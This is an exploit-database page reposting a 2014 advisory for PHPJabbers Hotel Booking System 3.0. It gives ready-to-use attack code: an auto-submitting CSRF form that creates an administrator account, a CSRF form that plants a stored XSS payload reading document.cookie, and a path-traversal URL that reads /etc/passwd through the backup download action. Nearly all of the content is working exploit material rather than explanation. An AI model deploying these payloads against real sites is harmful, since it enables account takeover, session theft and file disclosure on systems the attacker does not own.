[] NeoSense
E X P L O I T S
title author type platform port cve id

PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities

Author: HackXBack
type: webapps
platform: php
port: 80.0
date_added: 2014-01-15 
date_updated: 2014-01-15 
verified: 0 
codes: OSVDB-102223;OSVDB-102222;OSVDB-102219 
tags: 
aliases:  
screenshot_url:  
application_url: 
Hotel Booking System V3.0 - Multiple Vulnerabilties
====================================================================

####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/hotels-booking-system/
####################################################################

===[ Exploit ]===

[1] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="name" value="Iphobos"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html

[2] Cross Site Scripting
========================

# CSRF with XSS Exploit:


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0"
action="site/index.php?controller=pjAdminRooms&action=pjActionCreate">
<input type="hidden" name="room_create" value="1"/>
<input type="hidden" name="i18n[1][name]"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="i18n[2][name]" value=""/>
<input type="hidden" name="i18n[1][description]" value="Iphobos"/>
<input type="hidden" name="i18n[3][description]" value=""/>
<input type="hidden" name="i18n[2][description]" value=""/>
<input type="hidden" name="adults" value="1"/>
<input type="hidden" name="children" value="0"/>
<input type="hidden" name="cnt" value="1"/>
</form>
</body>
</html>


[3] Local File disclure
========================

http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd

####################################################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.